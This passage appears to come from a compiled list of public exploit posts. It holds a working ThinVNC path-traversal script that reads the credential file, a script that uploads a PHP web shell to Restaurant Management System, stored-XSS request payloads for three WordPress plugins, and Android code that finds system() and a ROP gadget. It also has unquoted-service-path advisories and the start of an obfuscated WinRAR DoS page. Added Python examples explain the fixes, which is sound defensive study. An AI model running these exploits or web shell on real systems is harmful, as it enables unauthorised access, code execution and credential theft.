            pos = i;
            break;
        }
    }
    free(buffer);
    return pos;
}

extern "C" JNIEXPORT jstring JNICALL
Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv *env, jobject)
{
    char buff[30];
    // system address
    snprintf(buff, sizeof(buff), "%p", get_system_address());
    if (libc != NULL)
        dlclose(libc);
    std::string system_string = buff;
    return env->NewStringUTF(system_string.c_str());
}

extern "C" JNIEXPORT jstring JNICALL
Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv *env, jobject)
{
    char buff[30];
    get_gadget_lib_base_address();
    long offset = search_for_gadget_offset();
    // gadget address (NULL when the gadget bytes were not found)
    snprintf(buff, sizeof(buff), "%p", offset < 0 ? (void *)NULL : (void *)(gadget_p + offset));
    if (lib != NULL)
        dlclose(lib);
    std::string system_string = buff;
    return env->NewStringUTF(system_string.c_str());
}
12. # Exploit Title: Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\foogallery"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://foo.gallery/
# Software Link: https://wordpress.org/plugins/foogallery/
# Version: 1.8.12
# Tested on: Kali Linux
# CVE: N/A

# Description
# This vulnerability is in the validation mode and is located in the plugin settings panel, and the vulnerability type is stored. It happens because in the settings there is a select tag; this select tag has options whose values are the gallery titles, so we simply have to break the option and write our script tag. The vulnerable parameters are as follows.
#
# 1. Go to 'Add Gallery' of FooGallery
# 2. Enter the payload in "Add Title"
# 3. Click the "Publish" option
# 4. Go to the plugin settings of FooGallery
# 5. Your payload will run
#
# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
# Parameter & Payload: post_title="/><script>alert("Unk9vvN")</script>

# POC

POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 2694
Cookie: ......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

_wpnonce=933471aa43&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dfoogallery&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=foogallery&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&auto_draft=&post_ID=32&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=14&mn=42&ss=45&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=14&cur_hh=14&hidden_mn=42&cur_mn=42&original_publish=Publish&publish=Publish&foogallery_sort=&foogallery_clear_gallery_thumb_cache_nonce=e18d32a542&_thumbnail_id=-1&_foogallery_settings%5Bfoogallery_items_view%5D=manage&foogallery_nonce=b6066e6407&foogallery_attachments=&foogallery_preview=e35a011572&foogallery_template=default&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bwidth%5D=150&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bheight%5D=150&_foogallery_settings%5Bdefault_thumbnail_link%5D=image&_foogallery_settings%5Bdefault_lightbox%5D=none&_foogallery_settings%5Bdefault_spacing%5D=fg-gutter-10&_foogallery_settings%5Bdefault_alignment%5D=fg-center&_foogallery_settings%5Bdefault_theme%5D=fg-light&_foogallery_settings%5Bdefault_border_size%5D=fg-border-thin&_foogallery_settings%5Bdefault_rounded_corners%5D=&_foogallery_settings%5Bdefault_drop_shadow%5D=fg-shadow-outline&_foogallery_settings%5Bdefault_inner_shadow%5D=&_foogallery_settings%5Bdefault_loading_icon%5D=fg-loading-default&_foogallery_settings%5Bdefault_loaded_effect%5D=fg-loaded-fade-in&_foogallery_settings%5Bdefault_hover_effect_color%5D=&_foogallery_settings%5Bdefault_hover_effect_scale%5D=&_foogallery_settings%5Bdefault_hover_effect_caption_visibility%5D=fg-caption-hover&_foogallery_settings%5Bdefault_hover_effect_transition%5D=fg-hover-fade&_foogallery_settings%5Bdefault_hover_effect_icon%5D=fg-hover-zoom&_foogallery_settings%5Bdefault_caption_title_source%5D=&_foogallery_settings%5Bdefault_caption_desc_source%5D=&_foogallery_settings%5Bdefault_captions_limit_length%5D=&_foogallery_settings%5Bdefault_paging_type%5D=&_foogallery_settings%5Bdefault_custom_settings%5D=&_foogallery_settings%5Bdefault_custom_attributes%5D=&_foogallery_settings%5Bdefault_lazyload%5D=&post_name=&foogallery_custom_css=
13. # Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\soliloquy-lite"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://soliloquywp.com/
# Software Link: https://wordpress.org/plugins/soliloquy-lite/
# Version: 2.5.6
# Tested on: Kali Linux
# CVE: N/A

# Description
# This vulnerability is in the validation mode and is located in the Preview of a new post inside Soliloquy, and the vulnerability type is stored. It happens when a user inserts a script tag in the title input and then saves the post. Everything will be OK until the target clicks on Preview of the vulnerabil.
#
# 1. Go to the 'Add New' section of Soliloquy
# 2. Enter the payload in "Add Title"
# 3. Select a sample image
# 4. Click the "Publish" option
# 5. Click on Preview
# 6. Your payload will run
#
# URI: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
# Parameter & Payload: post_title=/"><script>alert("Unk9vvN")</script>

# POC

POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1599
Cookie: .......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

_wpnonce=d9f78b76e2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=soliloquy&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&post_ID=50&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&_soliloquy%5Btype%5D=default&async-upload=&post_id=50&soliloquy=bdfd10296c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&_soliloquy%5Btype_default%5D=1&_soliloquy%5Bslider_theme%5D=base&_soliloquy%5Bslider_width%5D=960&_soliloquy%5Bslider_height%5D=300&_soliloquy%5Btransition%5D=fade&_soliloquy%5Bduration%5D=5000&_soliloquy%5Bspeed%5D=400&_soliloquy%5Bgutter%5D=20&_soliloquy%5Bslider%5D=1&_soliloquy%5Baria_live%5D=polite&_soliloquy%5Btitle%5D=%2F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_soliloquy%5Bslug%5D=scriptalert1script&_soliloquy%5Bclasses%5D=&wp-preview=dopreview&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=21&ss=21&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=21&cur_mn=21&original_publish=Update
14. # Exploit Title: Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\popupbuilder"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://popup-builder.com/
# Software Link: https://wordpress.org/plugins/popup-builder/
# Version: 3.49
# Tested on: Kali Linux
# CVE: N/A

# Description
# This vulnerability is in the validation mode and is located in "Add Post" or "Add Page" of WordPress, and the vulnerability type is stored. After installing Popup Builder it will make a section in Add Post and Add Page. In this section you choose which popup to show; it creates option tags whose values are the titles of the popups. Now it's easy: we just break the option tag and insert our script tag inside the popup title.
#
# 1. Go to the 'Add New' section of Popup Builder
# 2. Select Image type
# 3. Enter the payload in "Add Title"
# 4. Click the "Publish" option
# 5. Go to Add New of the Page section or Add New of the Post section
# 6. Your payload will run
#
# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=popupbuilder&sgpb_type=image&wp-post-new-reload=true
# Parameter & Payload: post_title="/><script>alert("Unk9vvN")</script>

# POC

POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post.php?post=39&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 2425
Cookie: ......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

_wpnonce=8dde4c5262&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=popupbuilder&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&post_ID=39&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=01&ss=34&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=01&cur_mn=03&original_publish=Update&save=Update&tax_input%5Bpopup-categories%5D%5B%5D=0&newpopup-categories=New+Category+Name&newpopup-categories_parent=-1&_ajax_nonce-add-popup-categories=11ba2a6f5c&sgpb-image-url=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-content%2Fuploads%2F2019%2F09%2Fwp2601087.jpg&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=not_rule&sgpb-type=image&sgpb-is-preview=0&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=select_event&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-custom-class=sgpb-popup-overlay&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120&sgpb-min-height=&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&post_name=scriptalert1script
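The FooGallery, Soliloquy Lite and Popup Builder advisories above describe one bug class: a stored post title is written into the value attribute of an <option> tag without attribute-context encoding, so a title that starts with a quote closes the attribute and the tag. The Python below is an added example, not code from any of the plugins or from the advisories: it renders the option both ways with the advisories' payload and then parses the result with the standard-library HTML parser, so the difference shows up as the list of start tags a browser would actually see. html.escape(quote=True) stands in for WordPress's esc_attr(); the single-option markup and the 'gallery' label are made up for the demonstration.

```python
import html
from html.parser import HTMLParser

# Payload used by the three advisories above.
PAYLOAD = '"/><script>alert("Unk9vvN")</script>'


def render_option_unsafe(title):
    """The bug class: a stored title dropped straight into an attribute value."""
    return '<option value="%s">gallery</option>' % title


def render_option_safe(title):
    """Attribute-context output encoding, the equivalent of esc_attr() in WordPress."""
    return '<option value="%s">gallery</option>' % html.escape(title, quote=True)


class _Walker(HTMLParser):
    """Record every start tag the browser would create and each <option>'s value."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "option":
            self.values.append(dict(attrs).get("value"))


def analyse(markup):
    """Return (start tags in document order, option values) for a rendered snippet."""
    walker = _Walker()
    walker.feed(markup)
    walker.close()
    return walker.tags, walker.values


if __name__ == "__main__":
    for name, render in (("unsafe", render_option_unsafe), ("safe", render_option_safe)):
        tags, values = analyse(render(PAYLOAD))
        print("%-6s tags=%s option value=%r" % (name, tags, values))
```

In the unsafe rendering the parser sees an empty <option> followed by a <script> element; in the safe one it sees a single <option> whose value decodes back to the full payload string, which is the behaviour the plugins' settings pages need.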
15. # Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
# Date: 2019-10-17
# Exploit Author: Nikhith Tumamlapalli
# Contributor WarMarX
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
# Version: 1.0b1
# Tested on: Windows All Platforms
# CVE : CVE-2019-17662
# Description:
# Authentication Bypass via Arbitrary File Read

#!/usr/bin/python3
import sys
import requests


def exploit(host, port):
    # The embedded HTTP server does not canonicalise the request path, so a
    # traversal sequence reads ThinVnc.ini, which holds the credentials.
    url = "http://" + host + ":" + port + "/xyz/../../ThinVnc.ini"
    r = requests.get(url)
    if r.status_code != 200:
        print("Unexpected HTTP status {}".format(r.status_code))
        return
    body = r.text
    print(body.splitlines()[2])
    print(body.splitlines()[3])


def main():
    if len(sys.argv) != 3:
        print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
        print("Example:\n{} 192.168.0.10 5888".format(sys.argv[0]))
    else:
        port = sys.argv[2]
        host = sys.argv[1]
        exploit(host, port)


if __name__ == '__main__':
    main()
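The ThinVNC bypass works because the embedded web server resolves /xyz/../../ThinVnc.ini against its document root without rejecting the resulting escape. The function below is an added example, not ThinVNC's code: it shows the canonicalisation a file-serving handler needs (percent-decode, normalise, then verify the result is still under the root as a path prefix) and runs the exploit's request path plus a few encoded variants through it. WEB_ROOT and the probe paths are constructed for the demonstration.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root standing in for ThinVNC's web directory; in the
# real install ThinVnc.ini sits above the files the server is meant to expose.
WEB_ROOT = "/opt/thinvnc/www"


def resolve_request_path(root, url_path):
    """Map an HTTP request path onto the document root.

    Returns the absolute file path to serve, or None when the request would
    escape the root. Decoding happens before normalisation so %2e%2e is
    handled like '..', and the final check is a path-prefix check so that
    /opt/thinvnc/www2 is not accepted as being under /opt/thinvnc/www."""
    decoded = unquote(url_path.split("?", 1)[0])
    if "\x00" in decoded or "\\" in decoded:
        return None  # NUL truncation and Windows separators are never legitimate here
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root.rstrip("/") + "/"):
        return None
    return candidate


# Request paths to exercise; the first is the one the exploit sends.
PROBES = [
    "/xyz/../../ThinVnc.ini",
    "/%2e%2e/ThinVnc.ini",
    "/..%2fThinVnc.ini",
    "/index.html",
    "/static/../index.html",
    "/",
]


def triage(root=WEB_ROOT, probes=PROBES):
    """Return {request path: resolved file path or None} for each probe."""
    return {p: resolve_request_path(root, p) for p in probes}


if __name__ == "__main__":
    for req, resolved in triage().items():
        print("%-26s -> %s" % (req, resolved or "REJECTED"))
```

Normalising before the prefix check is the whole point: a handler that only looks for the literal string ".." in the raw URL misses the percent-encoded forms, and one that checks the prefix before collapsing dot segments passes the exploit's path because it still starts with the root.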
16. # Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path
# Exploit Author: Debashis Pal
# Date: 2019-10-17
# Vendor Homepage : https://webcompanion.com
# Source: https://webcompanion.com
# Version: Web Companion versions 5.1.1035.1047
# CVE : N/A
# Tested on: Windows 7 SP1(64bit)

1. Description:
Web Companion versions 5.1.1035.1047 service 'WCAssistantService' has an unquoted service path.

2. PoC:
C:\>sc qc WCAssistantService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WC Assistant
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

3. Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
17. # Exploit Title: Restaurant Management System 1.0 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Ibad Shah
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: N/A
# Tested on: Apache 2.4.41

#!/usr/bin/python
import requests
import sys

print("#RMS Exploit")
print("Credits : All InfoSec (Raja Ji's) Group")

if len(sys.argv) < 2 or len(sys.argv[1]) < 8:
    print("[+] Usage : python rms-rce.py http://localhost:80/")
    sys.exit(1)
url = sys.argv[1]

print("[+] Restaurant Management System Exploit, Uploading Shell")
target = url + "admin/foods-exec.php"
boundary = "---------------------------191691572411478"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "multipart/form-data; boundary=" + boundary,
    "Connection": "close",
    "Referer": "http://localhost:8081/rms/admin/foods.php",
    "Cookie": "PHPSESSID=4dmIn4q1pvs4b79",
    "Upgrade-Insecure-Requests": "1"
}
# multipart body: the PHP shell goes in the 'photo' field, which foods-exec.php stores under images/
data = "\r\n".join([
    "--" + boundary,
    'Content-Disposition: form-data; name="photo"; filename="reverse-shell.php"',
    "Content-Type: text/html",
    "",
    '<?php echo shell_exec($_GET["cmd"]); ?>',
    "--" + boundary,
    'Content-Disposition: form-data; name="Submit"',
    "",
    "Add",
    "--" + boundary + "--",
    "",
])
# proxies routes the request through a local Burp listener; drop the argument to send directly
r = requests.post(target, verify=False, headers=headers, data=data, proxies={"http": "http://127.0.0.1:8080"})
print("[+] Shell Uploaded. Please check the URL : " + url + "images/reverse-shell.php")
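The upload handled by admin/foods-exec.php stores whatever arrives in the 'photo' field, including a .php file declared as text/html, under images/ where the web server executes it. The validator below is an added example, not code from Restaurant Management System: it decides on an extension allowlist, a strict base-name pattern (which also kills double extensions such as shell.php.png), and the file's own leading bytes, treats the client's Content-Type only as a consistency check, and gives the stored file a server-chosen name. The policy table and the sample upload parts are constructed for the example.

```python
import os
import re
import secrets

# Constructed policy for an image-only upload endpoint: extension -> (magic bytes, MIME type).
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    ".jpg": (b"\xff\xd8\xff", "image/jpeg"),
    ".jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    ".gif": (b"GIF8", "image/gif"),
}
SAFE_BASE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename, content_type, data):
    """Return (accepted, reason) for one multipart file part.

    The decision rests on the extension allowlist and the file's own leading
    bytes; the client-supplied Content-Type is only required to agree."""
    base, ext = os.path.splitext(os.path.basename(filename.replace("\\", "/")))
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension %r is not an allowed image type" % ext
    if not SAFE_BASE.match(base):
        return False, "base name %r rejected (double extension or odd characters)" % base
    magic, mime = ALLOWED[ext]
    if not data.startswith(magic):
        return False, "content does not start with the %s signature" % ext
    if content_type.split(";", 1)[0].strip().lower() != mime:
        return False, "Content-Type %r does not match %s" % (content_type, ext)
    return True, "ok"


def stored_name(filename):
    """Server-chosen name: random stem plus the validated extension, nothing else from the client."""
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()


# Constructed sample parts: the exploit's PHP shell and a minimal PNG header.
EXPLOIT_PART = ("reverse-shell.php", "text/html", b'<?php echo shell_exec($_GET["cmd"]); ?>')
PNG_PART = ("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16)

if __name__ == "__main__":
    samples = [
        EXPLOIT_PART,
        PNG_PART,
        ("shell.php.png", "image/png", PNG_PART[2]),
        ("photo.png", "image/png", b"<?php"),
    ]
    for part in samples:
        ok, why = validate_upload(*part)
        print(part[0], "->", "stored as " + stored_name(part[0]) if ok else "rejected: " + why)
```

Validation is only half of the fix: the directory the file lands in also needs script execution switched off in the web server, so that a validated image which later turns out to be polyglot still cannot run.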
18. # Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Service Path
# Exploit Author: Debashis Pal
# Date: 2019-10-17
# Vendor : Blackmoonftpserver
# Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server
# Version: BlackMoon FTP Server 3.1.2.1731
# CVE : N/A
# Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit)

1. Description:
BlackMoon FTP Server version 3.1.2.1731 service 'BMFTP-RELEASE' has an unquoted service path.

2. PoC:
C:\>sc qc BMFTP-RELEASE
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BMFTP-RELEASE
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BlackMoon FTP Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

3. Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
19. # Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: Softalk
# Version : 7.5.1
# Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3
# Tested on Windows 10
# CVE : N/A

c:\>sc qc WorkgroupMail
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WorkgroupMail
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WorkgroupMail
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
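Posts 6, 8, 9, 16, 18 and 19 above all report the same unquoted service binary path condition, and the step that turns the sc qc output into an attack is always the same: work out which file names CreateProcess will try before it reaches the real binary, then check who may write to those directories. The Python below is an added example, not tooling from any of the advisories: it digests sc qc output into the facts that matter (start type, account, BINARY_PATH_NAME), lists the candidate executables in the order Windows tries them, and emits the icacls commands to run on the box for the write-permission check, which cannot be decided offline. The sc qc sample is the WorkgroupMail output from post 19 re-typed as input; the other paths are copied from the other posts.

```python
import re

# Sample 'sc qc' output, re-typed from the WorkgroupMail post above.
SC_QC_SAMPLE = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WorkgroupMail
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WorkgroupMail
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Binary paths from the other unquoted-path posts on this page.
OTHER_PATHS = {
    "NiSvcLoc": r"C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s",
    "romservice": r"C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe",
    "Mikogo-Service": r"C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe",
    "WCAssistantService": r"C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe",
    "BMFTP-RELEASE": r"C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe",
}


def hijack_candidates(image_path):
    """Executables CreateProcess tries, in order, before the real one.

    With an unquoted path CreateProcess splits at every space and appends .exe
    to each prefix until something runs. A quoted path, or one with no space
    before the real .exe, yields no candidates."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    candidates, prefix = [], ""
    for token in path.split():
        prefix = token if not prefix else prefix + " " + token
        if prefix.lower().endswith(".exe"):
            break  # the intended binary; later tokens are its arguments
        candidates.append(prefix + ".exe")
    return candidates


def service_summary(sc_qc_text):
    """Digest 'sc qc' output into the facts that decide exploitability."""
    def field(label):
        m = re.search(r"^\s*%s\s*:\s*(.*?)\s*$" % label, sc_qc_text, re.M)
        return m.group(1) if m else ""
    path = field("BINARY_PATH_NAME")
    return {
        "name": field("SERVICE_NAME"),
        "auto_start": "AUTO_START" in field("START_TYPE"),
        "account": field("SERVICE_START_NAME"),
        "binary_path": path,
        "candidates": hijack_candidates(path),
    }


def icacls_commands(candidates):
    """Commands to run on the target to see who may create files in each candidate's directory."""
    dirs = []
    for c in candidates:
        d = c.rsplit("\\", 1)[0]
        if d not in dirs:
            dirs.append(d)
    return [("icacls %s\\" % d) if d.endswith(":") else ('icacls "%s"' % d) for d in dirs]


if __name__ == "__main__":
    s = service_summary(SC_QC_SAMPLE)
    print(s["name"], "auto-start" if s["auto_start"] else "manual", "as", s["account"])
    for c in s["candidates"]:
        print("  plant:", c)
    for cmd in icacls_commands(s["candidates"]):
        print("  check:", cmd)
    for name, path in OTHER_PATHS.items():
        print(name, "->", hijack_candidates(path) or "no unquoted-path candidates")
```

The candidate list is where the practical value sits: C:\Program.exe and C:\Program Files.exe both live in directories that only administrators can write to on a default install, so the interesting entry is usually the one under the vendor's own directory, and icacls on that directory decides whether a standard user can plant the file. The function returns an empty list for a path with no space before the .exe, which is what the Mikogo path from post 9 produces.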
20. # Exploit Title: winrar 5.80 64bit - Denial of Service
# Date: 2019-10-19
# Exploit Author: alblalawi
# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
# 1- open winrar or any file.rar
# 2- help
# 3- help topics
# 4- Drag the exploit to the window
# Save the content html

<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
"\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" +
"e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+
